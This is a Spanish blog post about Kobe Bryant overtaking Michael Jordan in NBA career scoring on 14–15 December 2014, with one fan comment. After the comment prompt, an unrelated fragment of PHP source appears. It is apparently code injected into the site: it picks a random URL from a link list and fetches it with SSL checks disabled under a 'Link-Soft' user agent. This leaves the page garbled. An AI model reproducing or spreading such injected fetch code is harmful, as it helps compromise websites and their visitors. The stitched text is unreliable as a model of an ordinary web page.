Kobe supera a Jordan

15 de December de 2014 por FranGuaita

A la 1:51 del domingo 15 de diciembre, el tiempo se detuvo en el Target Center de Minnesota. Precisamente en el estado que vio nacer a los Lakers en 1947, el mejor jugador en la historia de la franquicia entró para siempre en la leyenda. Kobe Bryant ya está por delante de Michael Jordan en la lista de anotadores históricos de la NBA.

Pasen y lean…

kobe_kobe

De la misma forma que consiguió su primer punto NBA en el Madison Square Garden un 5 de noviembre de 1996. Con el mismo procedimiento que anotó el que muchos decían que sería el último tiro tras romperse el tendón de Aquiles aquella maldita madrugada del 13 de abril de 2013. Un lanzamiento desde la línea de tiros libres en la recta final del segundo cuarto permitió a Kobe Bryant firmar su punto 32.293, con el que superaba a Michael Jordan en la lista de anotadores históricos de la NBA. Únicamente le preceden Kareem Abdul-Jabbar y Karl Malone. Desconociendo el ritual que estaba a punto de comenzar, el legendario escolta de los Lakers amagó con regresar a su zona para defender el ataque de Minnesota. Pero el trío arbitral detuvo el partido mientras el Target Center se ponía en pie para ovacionar a Kobe y todo el roster de L.A. accedía a la pista compartiendo un momento histórico con el mito nacido en Philadelphia.

El precioso gesto de los Timberwolves tuvo su epílogo con la aparición sobre el parquet de Glen Taylor, propietario de la franquicia, para hacer entrega al ’24’ del balón con el que consiguió el punto 32.293. Abrumado por el cariño que recibía por parte de un pabellón rival, Bryant se apresuró a entregar el valioso recuerdo a uno de los empleados de la franquicia que le aguardaba en el banquillo. Por el camino, se encontró con el sempiterno Gary Vitti, con el que ha compartido 19 temporadas de tratamientos milagrosos y confidencias. Y, con diferencia, el momento de la noche. Antes de regresar al juego, el abrazo de Byron Scott. Su mentor en la temporada rookie, hoy entrenador, quien, visiblemente emocionado quiso felicitar personalmente a KB en un día que ya nunca olvidaremos.

Larga vida a Kobe que, además, decidió el partido enchufando un triple desde más de siete metros con empate a 94 y ante la defensa de Wiggins. Otra de esas madrugadas que nos regala el que indudablemente es uno de los mejores jugadores en la historia del baloncesto.

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. txusma dice:
    #1

    Lo he dicho creo q en más de una ocasión: creo q lloraré el día que se retiren Kobe Bryant y Tim Duncan, 2 auténticos monstruos que a día de hoy tenemos el placer de disfrutar. Hoy el protagonismo es para Kobe y se lo merece. Impresionante la temporada que está llevando a cabo teniendo en cuenta su edad, la tralla que lleva en la liga y sobretodo su último año de lesiones. A sus pies.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>